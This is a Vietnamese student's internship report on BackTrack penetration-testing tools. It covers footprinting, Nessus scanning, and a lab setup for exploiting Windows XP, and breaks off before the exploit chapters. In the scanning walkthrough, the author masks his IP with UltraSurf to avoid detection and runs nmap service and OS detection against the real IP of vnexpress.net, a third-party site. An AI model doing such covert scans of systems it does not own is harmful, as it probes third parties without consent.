SlideShare a Scribd company logo
1 of 76
Download to read offline
i 
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG 
VÀ AN NINH MẠNG QUỐC TẾ 
ATHENA 
---------- 
BÁO CÁO THỰC TẬP TỐT NGHIỆP 
ĐỀ TÀI: 
NGHIÊN CỨU VÀ HƯỚNG DẪN SỬ DỤNG CÁC CHỨC NĂNG CỦA BACKTRACK ĐỂ KIỂM TRA AN NINH MẠNG. 
Giảng viên hướng dẫn: VÕ ĐỖ THẮNG. 
Sinh viên thực hiện ĐÀO CÔNG TRUNG. 
TP. Hồ Chí Minh, 2014.
ii 
LỜI CẢM ƠN. 
Em xin cám ơn Quý Thầy Cô khoa Cao đẳng thực hành, trường Đại học Công nghệ TP.HCM – HUTECH đã tạo điều kiện cho em được tham gia thực tập thực tế tại các công ty. 
Em xin cám ơn Quý Thầy Cô đã nhiệt tình giảng dạy giúp em có một lượng kiến thức đầy đủ để có thể hoàn thành báo cáo thực tập này. 
Em xin cám ơn thầy Võ Đỗ Thắng – Giám đốc Trung tâm đào tạo quản trị mạng và an ninh mạng Athena đã hết lòng hướng dẫn em trong quá trình thực tập. 
Em xin cám ơn Thầy Nguyễn Ngọc Đại đã đồng ý hướng dẫn giúp em hoàn thành báo cáo thực tập. 
Cám ơn tất cả các bạn bè thuộc tập thể lớp C12QM15 đã cùng nhau tham gia học tập trong suốt 2 năm qua. 
Sinh viên thực hiện 
ĐÀO CÔNG TRUNG
iii 
CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM 
Độc lập – Tự do – Hạnh phúc 
NHẬN XÉT THỰC TẬP 
Họ và tên sinh viên : ĐÀO CÔNG TRUNG. 
Mã sinh viên : 12203214. 
Khoá học : 2012-2014. 
1. Thời gian thực tập : 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
2. Bộ phận thực tập : 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
3. Tinh thần trách nhiệm với công việc và ý thức chấp hành kỷ luật : 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
4. Kết quả thực tập theo đề tài : 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
5. Nhận xét chung : 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
…………………………………………………………………………………… 
Cán bộ hướng dẫn của cơ quan đến thực tập 
(Ký và ghi rõ họ tên) 
Ngày ....... tháng ........ năm ......... 
Thủ trưởng cơ quan 
(Ký tên và đóng dấu)
iv 
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN : 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
.................................................................................................................................. 
Ngày ....... tháng ........ năm ......... 
GIÁO VIÊN HƯỚNG DẪN 
(Ký và ghi rõ họ tên)
v 
MỤC LỤC 
LỜI CÁM ƠN. .............................................................................................................. ii 
NHẬN XÉT THỰC TẬP ............................................................................................ iii 
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ....................................................... iv 
LỜI MỞ ĐẦU ............................................................................................................. vii 
CHƯƠNG 1: GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VÀ DỰ ÁN MẠNG. . 1 
1.1 GIỚI THIỆU VỀ CÔNG TY. ........................................................................ 1 
1.2 LỊCH SỬ HÌNH THÀNH. ............................................................................. 1 
1.3 QUÁ TRÌNH PHÁT TRIỂN. ........................................................................ 2 
1.4 CHỨC NĂNG VÀ NHIỆM VỤ . .................................................................. 3 
1.5 CƠ CẤU TỔ CHỨC ..................................................................................... . 3 
1.6 LĨNH VỰC HOẠT ĐỘNG KINH DOANH. ................................................ 3 
1.7 THÔNG TIN VỀ DỰ ÁN SINH VIÊN THAM GIA THỰC TẬP. .............. 4 
CHƯƠNG 2 : THỰC TRẠNG QUÁ TRÌNH THỰC HIỆN DỰ ÁN MẠNG ....... . 5 
2.1. TIẾN ĐỘ THỰC HIỆN DỰ ÁN. .................................................................. 5 
2.2. QUÁ TRÌNH THI CÔNG CÁC HẠNG MỤC CỦA DỰ ÁN. ..................... 5 
2.2.1. TỔNG QUAN VỀ BACKTRACK. ........................................................... 5 
2.2.1.1. GIỚI THIỆU BACKTRACK. ............................................................. 5 
2.2.1.2. LỊCH SỬ PHÁT TRIỂN. .................................................................... 6 
2.2.1.3. MỤC ĐÍCH. ........................................................................................ 6 
2.2.2. FOOTPRINTING ....................................................................................... 7 
2.2.3. CÁC KIỂU FOOTPRINTING. .................................................................. 8 
2.2.3.1. PASSIVE FOOTPRINTING. ............................................................... 8 
2.2.3.2. ACTIVE FOOTPRING. .................................................................... 13 
2.2.4. SCANING ................................................................................................ 13 
2.2.4.1. CÁC CÔNG CỤ TIỆN ÍCH. ............................................................. 14 
2.2.4.2. QUÁ TRÌNH THỰC HIỆN SCANING. ........................................... 14 
2.2.5. QUÁ TRÌNH XÂM NHẬP HỆ THỐNG QUA CÁC LỖ HỔNG. ......... 20 
2.2.5.1. LỖI MS08_067. ................................................................................. 20 
2.2.5.2. LỖI MS10_090. ................................................................................. 26 
2.2.5.3. LỖI MS12_004. ................................................................................. 34 
2.2.5.4. LỖI MS12_027. 43
vi 
2.2.5.5. MỞ PORT TREN MODEM,TẤN CONG NGOAI MẠNG INTERNET. ....................................................................................................... 52 
2.2.5.6. CÀI ĐẶT METASPLOIT TREN VPS. SỬ DỤNG GIAO DIỆN WEB CỦA METASPLOIT KHAI THÁC MÃ LỖI MS10_090 TỪ VPS. ...... 59 
2.2.5.7. XÂM NHẬP WINDOWS 8 TỪ VPS. .............................................. 65 
CHƯƠNG 3 : NHẬN XÉT- ĐÁNH GIÁ. ................................................................. 69 
3.1. ƯU ĐIỂM. ................................................................................................... 69 
3.2. KHUYẾT ĐIỂM. ......................................................................................... 69 
3.3. KẾT LUẬN. ................................................................................................ 69
vii 
LỜI MỞ ĐẦU 
Trong thời đại ngày nay, vai trò của Công nghệ Thông tin (CNTT) và Internet ngày càng vô cùng quan trọng. Điều này kéo theo phần lớn các ngành kinh tế phụ thuộc vào máy vi tính. Chính vì vậy, nhiều ý đồ phá hoại đã nhắm vào hệ thống này, và cũng không loại trừ khả năng đối thủ cạnh tranh nhau, do đó để bảo đảm máy tính hoạt động trơn tru, liên tục đòi hỏi hệ thống phải trang bị những công cụ, những biện pháp phòng thủ, những hệ thống cảnh báo, bảo mật cao nhằm chống lại những tin tặc (hacker). Chúng ta biết rằng hacker có 2 loại, hacker mũ đen và hacker mũ trắng. Hacker mũ đen là những tay tinh quái và thông minh vô cùng, họ không chỉ giỏi về khả năng lập trình mà còn giỏi về cả mạng, giao thức mạng, họ có thể lợi dụng những lỗi nhỏ nhất từ đó khai thác và tấn công hệ thống máy chủ, gây thiệt hại lớn nếu đó là 1 doanh nghiệp lớn, 1 tập đoàn lớn, hay ngân hàng… Thật nguy hiểm nếu như toàn bộ thông tin tài khoản ngân hàng của khách hàng loạt vào tay hacker, cũng như những dự án, kế hoạch của tập đoàn hay của doanh nghiệp. Quả thật thiệt hại do hacker gây ra quá lớn ảnh hưởng nghiêm trọng đến người dùng máy tính. Vì vậy nhằm chống lại những hacker mũ đen, những hacker mũ trắng không ngừng nâng cao kiến thức cũng như sự nhạy bén, cẩn thận, tư duy sáng tạo không ngừng nhằm ngăn chặn, bảo vệ người dùng máy tính, tạo nơi người dùng sự tin cậy cũng như những thông tin, tài khoản, kế hoạch, dự án của họ sẽ hoàn toàn được bảo mật an toàn tuyệt đối. Do đó vai trò an ninh mạng thật sự thiết thực cũng giống như 1 đất nước nếu không có lực lượng công an, cảnh sát, quân đội thì hậu quả mà người dân phải gánh chịu thật nghiêm trọng, và chắc chắn đất nước đó sẽ không bao giờ phát triển kịp theo thời đại kỹ thuật số hiện nay. 
Nội dung báo cáo gồm 3 chương chính. 
Chương 1: Giới thiệu chung đơn vị thực tập và dự án mạng. 
Chương 2: Thực trạng quá trình thực hiện dự án mạng 
Chương 3: Nhận xét, đánh giá thực trạng.
1 
CHƯƠNG 1: GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VÀ DỰ ÁN MẠNG. 
1.1 GIỚI THIỆU VỀ CÔNG TY. 
Trung Tâm Đào Tạo Mạng và Quản Trị Mạng Quốc Tế ATHENA tiền thân là Công ty 
TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Và Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008. 
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK 
SECURITY COMPANY LIMITED. 
1.2 LỊCH SỬ HÌNH THÀNH. 
Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn và về tương lai của ngành công nghệ thông tin, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào tạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội. 
Các thành viên sáng lập bao gồm: 
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu Athena, hiện tại là giám đốc dự án công ty Siemen Telecom. 
Ông Hứa Văn Thế Phúc: Phó Giám Đốc Phát triển Thương Mại Công ty EIS, Phó 
Tổng Công ty FPT. 
Ông Nghiêm Sỹ Thắng: Phó Tổng Giám Đốc Ngân hàng Liên Việt, chịu trách nhiệm 
công nghệ thông tin của ngân hàng. 
Ông Võ Đỗ Thắng: hiện là Giám Đốc Trung tâm đào tạo quản trị và an ninh mạng 
Athena. 
Đến năm 2003, bốn thành viên sáng lập cùng với đội ngũ ứng cứu máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam. Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, hay còn gọi là Trung tâm đào tạo Quản trị và An ninh mạng Quốc Tế Athena (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số
2 
4104006757 của Sở Kế Hoạch Và Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008 . 
1.3 QUÁ TRÌNH PHÁT TRIỂN. 
Từ năm 2004 - 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung tâm trở thành một trong những địa chỉ đáng tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh và đào tạo cho đội ngũ nhân viên các doanh nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử và bảo mật webvà là địa chỉ đáng tin cậy của nhiều học sinh, sinh viên đến đăng ký học. Đòi hỏi cấp thiết trong thời gian này của trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung, doanh nghiệp, cá nhân nói riêng. 
Đến năm 2006: Trung tâm đào tạo và quản trị mạng Athena mở ra một chi nhánh tại cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thơi gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành nghề từ các tổ chức, doanh nghiệp nhằm làm giàu thêm đội ngũ của trung tâm. 
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm gặp nhiều khó khăn. Ông Nguyễn Thế Đông cùng ông Hứa Văn Thế Phúc rút vôn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống của trung tâm cộng thêm hoạt động tại chi nhánh Nguyễn Văn Trỗi không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. 
Lúc này với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm, mở ra một làn gió mới và giai đoạn mới, cùng với quyết tâm mạnh mẽ và tinh thần thép đã giúp ông vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kỳ khủng hoảng. 
Từ năm 2009 - nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược, trung tâm dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết rất nhiều công ty và doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn
3 
nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà. 
1.4 CHỨC NĂNG VÀ NHIỆM VỤ . 
Trung tâm ATHENA là nơi đào tạo, phát triển nguồn nhân lực công nghệ thông tin nước nhà, là nơi mà bất cứ ai yêu thích và đam công nghệ thông tin phát triển kỹ năng nghề nghiệp tương lai, đồng thời ATHENA cũng là nơi bồi dưỡng những kỹ năng cũng như trao đổi kinh nghiệm thực tế qua những những chương trình đào tạo ngắn hạn miễn phí với mọi người, ngoài ra ATHENA còn có những khóa học dài hạn nhằm bổ sung, củng cố kiến thức cho sinh viên, học sinh hay cho người đã đi làm muốn nâng cao thêm tay nghề của mình. 
1.5 CƠ CẤU TỔ CHỨC. 
1.6 LĨNH VỰC HOẠT ĐỘNG KINH DOANH. 
Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính.
4 
Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng, Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh.... 
Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác 
và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...... 
1.7 THÔNG TIN VỀ DỰ ÁN SINH VIÊN THAM GIA THỰC TẬP. 
- Nghiên cứu và hướng dẫn sử dụng các chức năng backtrack để kiểm tra an ninh mạng : 
 Tìm hiểu các công cụ thu thập thông tin. 
 Tìm hiểu các công cụ Target Discovery. 
 Tìm hiểu các công cụ scan lỗi. 
 Tìm hiểu các công cụ Enumeration. 
 Tìm hiểu các công cụ exploit. 
 Tìm hiểu các công cụ Privilege Escalation. 
 Tìm hiểu các công cụ Maintaining Access. 
- Các bước cần chuẩn bị : 
 Hệ điều hành BackTrack, windows XP,windows 7,windows 8. 
 Phần mềm VMware. 
 VPS. 
 Hệ thống mạng Internet.
CHƯƠNG 2 : THỰC TRẠNG QUÁ TRÌNH THỰC HIỆN DỰ ÁN MẠNG. 
2.1. TIẾN ĐỘ THỰC HIỆN DỰ ÁN. 
- Ngày 07/10 : Nhận đề tài thực tập. Xác định các bước thực hiện. Quay clip giới thiệu. 
- Ngày 09/10 : Tìm hiểu và cài đặt BackTrack. 
- Ngày 11/10 : Tìm hiểu các sản phẩm của Athena. Tìm hiểu cách thức phát hiện lỗi bằng Backtrack. 
- Ngày 14/10 : Tìm hiểu scan hệ thống. 
- Ngày 16/10 : Cài đặt Nessus, quét thông tin máy XP. Tìm hiểu nmap-scripts. 
- Ngày 18/10 : Tìm hiểu lỗ hổng ms08_067. 
- Ngày 21/10 : Tìm hiểu lỗ hổng ms10_090. 
- Ngày 24/10 : Tìm hiểu lỗ hổng ms12_004. 
- Ngày 26/10 : Tìm hiểu lỗ hổng ms12_027. 
- Ngày 28/10 : Tìm hiểu lỗ hổng ms12_020. 
- Ngày 30/10 : Tìm hiểu về công cụ Metasploit trong BackTrack. 
- Ngày 03/11 : Thực hiện xâm nhập hệ điều hành XP qua lỗ hổng ms08_067 bằng Metasploit.( https://www.youtube.com/watch?v=m3M33vEqg4s) 
- Ngày 05/11 : Thực hiện xâm nhập hệ điều hành XP qua lỗ hổng ms10_090 bằng Metasploit.( https://www.youtube.com/watch?v=fUygw4tjDOI) 
- Ngày 08/11 : Thực hiện xâm nhập hệ điều hành XP qua lỗ hổng ms12_004 bằng Metasploit.( https://www.youtube.com/watch?v=hPmPqKC2zaM) 
- Ngày 11/11 : Thực hiện xâm nhập hệ điều hành XP qua lỗ hổng ms12_027 bằng Metasploit.( https://www.youtube.com/watch?v=BDVLpPF_NOg) 
- Ngày 25/11 : Tìm hiểu về VPS, Honeypot. 
- Ngày 29/11 : Cài đặt Metasploit trên VPS. Xâm nhập windows 8 từ VPS. (Cài đặt : https://www.youtube.com/watch?v=pkEn79kQ4CI) 
(Xâm nhập windows 8 : https://www.youtube.com/watch?v=0DtgzfdPl8A) 
2.2. QUÁ TRÌNH THI CÔNG CÁC HẠNG MỤC CỦA DỰ ÁN. 
2.2.1. Tổng quan về BackTrack. 
2.2.1.1. Giới thiệu Backtrack. 
Backtrack là một hệ điều hành phát triển trên nhân Linux đồng thời cũng là bộ sưu tập các công cụ kiểm tra đánh giá mức độ an ninh của hệ thống mạng một cách toàn diện. Backtrack trở thành một công cụ không thể thiếu với những ai muốn tìm hiểu nghiên cứu, và khám phá thế giới bảo mật.
6 
Nguồn tải: http://www.backtrack-linux.org/downloads/ 
2.2.1.2. Lịch sử phát triển. 
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong các định dạng Live DVD, bạn sử dụng có thể Backtrack trực tiếp từ đĩa DVD mà không cần cài nó vào máy của bạn. Backtrack cũng có thể được cài đặt vào ổ cứng và sử dụng như một hệ điều hành. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm -IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (4.0), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 8,10. Tính đến ngày 19 tháng bảy năm 2010, Backtrack 4 đã được tải về của hơn 1,5 triệu người sử dụng. Backtrack dành cho tất cả mọi người từ các chuyên gia trong lĩnh vực bảo mật tới những người mới bước vào lĩnh vực an toàn thông tin và bạn có thể dễ dàng tìm và cập nhật cơ sở dữ liệu một cách nhanh nhất về bộ sưu tập các công cụ bảo mật. Cộng đồng phát triển lên Backtrack bao gồm từ những người có kiến thức sâu và kinh nghiệm trong lĩnh vực an toàn thông tin, tới từ các cơ quan chính phủ, trong lĩnh vực công nghệ thông tin, hoặc những người đam mê về bảo mật, đến các cá nhân mới gia nhập vào cộng đồng bảo mật. Hiện nay Backtrack đã phát triển đến phiên bản mới nhất là Backtrack6 (hay còn gọi là Kali Linux). 
2.2.1.3. Mục đích. 
Backtrack chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của bạn. Các công cụ kiểm tra thâm nhập trong Backtrack có thể được phân loại như sau: 
- Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail. Thông tin này được thu thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu. 
- Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning. 
- Vulnerability identification: Trong thể loại này, bạn có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).
7 
- Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web 
- Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), bạn có thể sử dụng các công cụ trong thể loại này. 
- Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. 
- Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, bạn có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của bạn cho các đặc quyền cao nhất. 
- Maintaining access: Công cụ trong loại này sẽ có thể giúp bạn trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Bạn có thể cần để có được những đặc quyền cao nhất trước khi các bạn có thể cài đặt công cụ để duy trì quyền truy cập 
- Voice Over IP (VOIP): Để phân tích VOIP bạn có thể sử dụng các công cụ trong thể loại này . 
Backtrack cũng có những tool sử dụng cho: 
- Digital forensics: Trong loại này, bạn có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, bạn có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi bạn phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. 
- Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. 
2.2.2. Footprinting là gì? 
Footprinting là 1 trong 3 quá trình đầu tiên mà hacker sẽ tiến hành nhằm thu thập thông tin của mục tiêu thông qua các cơ sở dữ liệu công khai như các thông tin về tên miền của tổ chức, danh bạn điện thọai, các trang vàng doanh nghiệp để tìm kiếm địa chỉ, số điện thọai, địa chỉ email của các bộ phận .v.v. Đây là bước rất quan trọng và các attacker thường dành ra đến 90% thời gian để tiến hành thu thập thông tin, còn quá trình tấn công chỉ diễn ra trong 10% trong toàn bộ quá trình. Điều này cũng giống như bước chuẩn bị khi chúng ta cần tiến hành triển khai một công việc nào đó trong quá trình
8 
kinh doanh hay phát triển ý tưởng mới. Thông tin càng nhiều thì cơ hội tấn công thành công càng cao. Để tiến hành thu thập thông tin một cách khoa học, các hacker/attacker cần thực hiện theo một sơ đồ như sau: 
1. Tìm kiếm từ các nguồn thông tin. 
2. Xác định các dãy địa chỉ mạng. 
3. Xác định các máy còn họat động 
4. Tìm kiếm những port mở (open port) hay điểm truy cập của mục tiêu (access point) 
5. Dò tìm hệ điều hành của mục tiêu. 
6. Tìm kiếm các dịch vụ đang họat động trên những port mở. 
7. Lập mô hình mạng. 
Thông tin tìm kiếm cần thiết như: 
1. Network Informations: Domain, Network blocks, IP, TCP hay UDP, System Enumeration, ACLs, IDSes, v.v.. 
2. System Informations: OS, user and group name, system name, kiến trúc system, SNMP, Routing 
3. Organziation Informations: Tên công ty, nhân viên, websites, địa chỉ, số điện thoại, Email liên lạc, các kiến thức liên quan đến tình hình kinh doanh của công ty. 
Trong quá trình này Hacker chủ yếu dùng các phương tiện thông tin công cộng như báo chí, internet để tìm hiểu các thông tin hợp pháp về mục tiêu nên footprinting hầu như không thể phát hiện vì đây là hành động hợp pháp. 
2.2.3. CÁC KIỂU FOOTPRINTING. 
2.2.3.1. Passive Footprinting. 
Passive footprinting là hình thức tiềm kiếm thông tin thông qua bài báo, trang web, những website hỗ trợ tìm kiếm như: www.google.com, www.tenmien.vn, www.whois.domaintools.com, , www.arcchive.org..., http://centralops.net/co/... 
Ta tra cứu tên miền vnexpress.net. thông qua trang web:www.tenmien.vn
9 
Và đây là toàn bộ thông tin về tên miền vnexpress.net 
Ta tra cứu tên miền vnexpress.net. thông qua trang web: http://centralops.net/co/
10 
Và đây là toàn bộ thông tin về tên miền vnexpress.net
11
12
13 
2.2.3.2. ACTIVE FOOTPRING. 
Active Footprinting là hình thức liên hệ trực tiếp với mục tiêu để thu thập thông tin như công ty, nhân viên, địa chỉ, network, liên lạc qua Email để tìm hiểu các thông tin có thể. Phương pháp này đòi hỏi nhiều kỹ năng giao tiếp, và kỹ năng khai thác thông tin nếu như bạn có đầu óc thám tử thì mọi chuyên trở nên đơn giản rất nhiều. 
2.2.4. SCANING LÀ GÌ? 
Scanning là quá trình tìm hiểu thông tin về các live host trên mạng để hacker quyết định kiểu tấn công nào thích hợp để tấn công vào hệ thống, nếu như quá trình footprinting là việc xác định nguồn thông tin ở đâu thì scanning chính là quà trình sàng lọc, rà soát, tìm kiếm những cánh cổng cũng như lỗ hổng hệ thống để xâm nhập vào những vào nguồn thông tin đó. Trong quá trình scanning, hacker sẽ tìm kiếm những đối tượng sau: 
- Live system: Xác định xem hệ thống mà chúng ta đang nhắm tới có còn hoạt động hay không. Máy tính (host) đang quét có hoạt động trên internet hay không. Địa chỉ ip có đang trong trạng tháy public. 
- Port: Mục tiêu tiếp theo là xác định các port đang mở. Việc xác định port này cho phép chúng ta biết máy tính đó đang mở các dịch vụ nào. Từ đó xác định được
14 
mục đích của cuộc tấn công. 
- OS: Xác định hệ điều hành đang sử dụng trên máy tính mục tiêu sẽ giúp hacker 
tìm ra các lỗ hổng thông dụng. Các hệ điều hành không nhiều thì ít cũng tiềm 
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn công đột nhập. Xác định hệ điều hành còn phải xác định phiên bản của nó. 
- Service: Hiểu rõ những dịch vụ đang chạy và lắng nghe trên hệ thống đích. 
Phiên bản của dịch vụ nào cũng chứa những lỗi nhỏ, mà nếu biết khai thác lỗ nhỏ đó thì nó không còn nhỏ chút nào. 
- IP Address: Không chỉ có một ip của một host, mà chúng ta cũng cẩn xác định 
dãy địa chỉ mạng, và những host khác có liên quan như Default gateway, DNS 
Server 
- Vulnerability: Các lỗi của host hoặc lỗi của hệ điều hành. 
2.2.4.1. CÁC CÔNG CỤ TIỆN ÍCH. 
http://ultrasurf.us/, ta tải công cụ về để che giấu đi địa chỉ IP thật của máy. 
http://nmap.org/download.html ta scan những port đang mở/đóng, những dịch vụ đang chạy, cùng với phiên bản đi kèm. 
http://www.tenable.com/products/nessus/select-your-operating-system công cụ quét lỗi hệ điều hành. 
2.2.4.2. QUÁ TRÌNH THỰC HIỆN SCANING. 
Bước 1. Cho giấu địa chỉ IP của mình để tránh bị phát hiện. 
Ta truy cập vào trang web http://ultrasurf.us/, ta tải công cụ và cài đặt.
15 
Sau đó ta vào website http://ip2location.com/ để kiểm tra IP của máy, kết quả là IP ở 
Việt Nam. 
Ta chạy phần mềm ultrasurf, và xuất hiện góc phải bên dưới biểu tượng ổ khóa màu 
vàng, đây là biểu tượng kích hoạt IP máy đã được thay đổi.
16 
Ta truy cập lại website http://ip2location.com/ để kiểm tra IP của máy, kết quả là IP đã 
thay đổi thành IP của Mỹ. 
Bước 2: Scan port cùng một trong dãy mạng. 
Ta bật máy Backtrack5 R3 lên đăng nhập và khởi động Ternimal. Ta gõ lệnh:
17 
ping vnexpress.net để xác định địa chỉ IP của trang website là 111.65.248.132 
Ta tiếp tục gõ lệnh nmap -sV -O 111.65.248.132
18 
Kết quả là ta đã xác định được những port đang mở, tên dịch vụ đang chạy. 
Ta tiếp tục truy cập website http://news.netcraft.com/ để xác định OS, Web Server mà 
trang websiter đang chạy. 
Bước 3: Sau khi xác định được những thông tin như port nào đóng/mở, những dịch vụ đang chạy, phiên bản đi kèm, ta bắt đầu Scan những lỗi liên quan. Ta download và cài đặt công cụ quét lỗi Nessus từ trang web : 
http://www.tenable.com/products/nessus/select-your-operating-system 
Giao diện đăng nhập của Nessus:
19 
Ta đăng nhập với user và password đã khai báo lúc cài đặt. 
Thiết lập những Policie, cần thiết để phục vụ quá trình Scan lỗi tương ứng, sau khi 
đã thiết lập xong, ta bắt đầu Scan lỗi hệ điều hành. 
Tại ô Name ta điền tên hệ điều hành, Policy ta chọn Policies đã thiết lập trước đó, 
Target chính là mục tiêu mà ta muốn Scan. Và chon Lauch để bắt đầu Scan. Kết quả sau khi Scan Windows XP Service Pack 2. 
Những lỗi màu đỏ thể hiện đó chính là những lỗi nghiêm trọng. Màu Vàng chỉ ở mức 
trung bình, và màu xanh là những thông ti về hệ điều hành.
20 
Cuối cùng sau khi đã xác định được những lỗi của hệ điều hành, ta bắt đầu tìm hiểu 
khai thác những lỗ hỏng đó. 
2.2.5. QUÁ TRÌNH XÂM NHẬP HỆ THỐNG QUA CÁC LỖ HỔNG. 
Cần chuẩn bị 1 máy cài Backtrack và 1 máy đóng vai trò là máy nạn nhân để ta xâm nhập ( sử dụng hệ điều hành XP). Kết nối 2 máy như mô hình bên dưới. 
